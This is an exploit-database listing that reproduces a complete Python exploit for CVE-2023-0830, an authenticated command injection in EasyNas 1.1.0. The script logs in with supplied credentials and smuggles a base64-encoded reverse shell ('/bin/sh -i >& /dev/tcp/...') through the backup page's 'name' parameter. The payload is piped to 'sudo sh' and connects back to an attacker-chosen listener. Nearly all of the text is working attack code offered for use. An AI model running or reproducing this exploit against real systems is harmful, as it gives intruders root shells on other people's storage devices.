Exploit for EasyNas 1.1.0 Command Injection CVE-2023-0830

Name: Exploit for EasyNas 1.1.0 Command Injection CVE-2023-0830
Rating: 5 (101 reviews)
2023-04-06 | CVSS 8.8
## https://sploitus.com/exploit?id=PACKETSTORM:171735
# Exploit Title: EasyNas 1.1.0 - OS Command Injection  
# Date: 2023-02-9  
# Exploit Author: Ivan Spiridonov (ivanspiridonov@gmail.com)  
# Author Blog: https://xbz0n.medium.com  
# Version: 1.0.0  
# Vendor home page : https://www.easynas.org  
# Authentication Required: Yes  
# CVE : CVE-2023-0830  
  
#!/usr/bin/python3  
  
import requests  
import sys  
import base64  
import urllib.parse  
import time  
  
from requests.packages.urllib3.exceptions import InsecureRequestWarning  
  
# Disable the insecure request warning  
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  
  
if len(sys.argv) < 6:  
print("Usage: ./exploit.py http(s)://url username password listenerIP listenerPort")  
sys.exit()  
  
url = sys.argv[1]  
user = sys.argv[2]  
password = sys.argv[3]  
  
# Create the payload  
payload = "/bin/sh -i >& /dev/tcp/{}/{} 0>&1".format(sys.argv[4], sys.argv[5])  
  
# Encode the payload in base64  
payload = base64.b64encode(payload.encode()).decode()  
  
# URL encode the payload  
payload = urllib.parse.quote(payload)  
  
# Create the login data  
login_data = {  
'usr':user,  
'pwd':password,  
'action':'login'  
}  
  
# Create a session  
session = requests.Session()  
  
# Send the login request  
print("Sending login request...")  
login_response = session.post(f"https://{url}/easynas/login.pl", data=login_data, verify=False)  
  
# Check if the login was successful  
if 'Login to EasyNAS' in login_response.text:  
print("Unsuccessful login")  
sys.exit()  
else:  
print("Login successful")  
  
  
# send the exploit request  
timeout = 3  
  
try:  
exploit_response = session.get(f'https://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{payload}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23', headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, timeout = timeout, verify=False)  
if exploit_response.status_code != 200:  
print("[+] Everything seems ok, check your listener.")  
else:  
print("[-] Exploit failed, system is patched or credentials are wrong.")  
  
except requests.exceptions.ReadTimeout:  
print("[-] Everything seems ok, check your listener.")  
sys.exit()